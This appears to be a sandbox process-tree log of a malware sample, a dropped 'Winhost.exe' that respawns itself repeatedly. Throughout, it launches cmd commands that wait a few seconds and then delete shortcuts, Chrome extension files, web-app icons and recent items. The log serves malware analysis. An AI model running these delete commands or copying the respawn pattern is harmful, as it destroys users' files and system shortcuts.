C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11536
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"3⤵PID:19872
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk"3⤵PID:20460
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13764
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"3⤵PID:19568
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14972
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"3⤵PID:19636
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13388
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk"3⤵PID:19684
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk"3⤵PID:16796
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15408
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk"3⤵PID:16996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16296
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk"3⤵PID:20492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13792
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk"3⤵PID:20752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16408
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png"3⤵PID:20768
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16312
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\offscreendocument.html"3⤵PID:20780
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4864
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4BIWV20J\www.bing[1].xml"3⤵PID:20792
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html"3⤵PID:20804
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16432
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png"3⤵PID:20816
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14188
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png"3⤵PID:20828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15352
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png"3⤵PID:20840
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6696
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png"3⤵PID:20852
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png"3⤵PID:20864
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14728
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png"3⤵PID:20876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4484
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png"3⤵PID:20888
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14648
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png"3⤵PID:20900
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16264
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png"3⤵PID:20912
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15708
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png"3⤵PID:20924
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14872
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png"3⤵PID:20936
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13888
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png"3⤵PID:20948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10956
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png"3⤵PID:20960
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png"3⤵PID:20972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14164
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png"3⤵PID:20984
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png"3⤵PID:20996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7264
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png"3⤵PID:21008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png"3⤵PID:21020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13444
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png"3⤵PID:21032
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2212
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png"3⤵PID:21044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13948
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png"3⤵PID:21056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16112
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png"3⤵PID:21376
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6624
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png"3⤵PID:21388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16328
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png"3⤵PID:21400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16120
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png"3⤵PID:21412
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13576
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png"3⤵PID:21428
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png"3⤵PID:21452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:584
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png"3⤵PID:21464
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15404
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png"3⤵PID:21476
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png"3⤵PID:21488
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16484
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png"3⤵PID:17308
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png"3⤵PID:16588
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png"3⤵PID:20640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13704
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png"3⤵PID:17076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15084
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png"3⤵PID:18888
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14656
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png"3⤵PID:17160
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png"3⤵PID:17340
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png"3⤵PID:20152
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14976
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png"3⤵PID:20348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14644
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png"3⤵PID:19540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10932
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png"3⤵PID:20748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13924
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png"3⤵PID:21520
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6948
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png"3⤵PID:21536
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14840
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png"3⤵PID:21548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13436
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png"3⤵PID:21560
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16396
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png"3⤵PID:21576
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11136
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png"3⤵PID:21600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16052
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png"3⤵PID:21612
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14780
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png"3⤵PID:21624
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:768
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"3⤵
- Executes dropped EXE
PID:12764 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"4⤵PID:7052
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:15680
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"4⤵
- Executes dropped EXE
PID:5772 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"5⤵PID:10056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:10528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"5⤵
- Executes dropped EXE
PID:10088 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:14368
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"6⤵PID:15988
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:14132
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"6⤵
- Executes dropped EXE
PID:15796 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"7⤵PID:14296
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:16140
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"7⤵
- Executes dropped EXE
PID:16216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:15064
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"8⤵PID:11604
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:15760
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"8⤵
- Executes dropped EXE
PID:16228 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"9⤵
- Executes dropped EXE
PID:16064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:14820
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"10⤵
- Executes dropped EXE
PID:16116 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"11⤵PID:11748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵PID:16356
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"11⤵
- Executes dropped EXE
PID:11556 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"12⤵
- Executes dropped EXE
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"13⤵
- Executes dropped EXE
PID:11308 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"14⤵
- Executes dropped EXE
PID:12048 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"15⤵
- Executes dropped EXE
PID:4984 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"16⤵
- Executes dropped EXE
PID:6508 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"17⤵
- Executes dropped EXE
PID:16272 -
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"18⤵
- Executes dropped EXE
PID:6824 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"19⤵PID:8896
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 320⤵PID:11880
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"19⤵
- Executes dropped EXE
PID:1264 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"20⤵PID:8992
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 321⤵PID:12292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"20⤵PID:9800
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 321⤵PID:6152
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"20⤵PID:10860
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 321⤵PID:15460
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"20⤵
- Executes dropped EXE
PID:7028 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"21⤵PID:10828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 322⤵PID:9576
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"21⤵PID:8112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 322⤵PID:4720
-
-
-
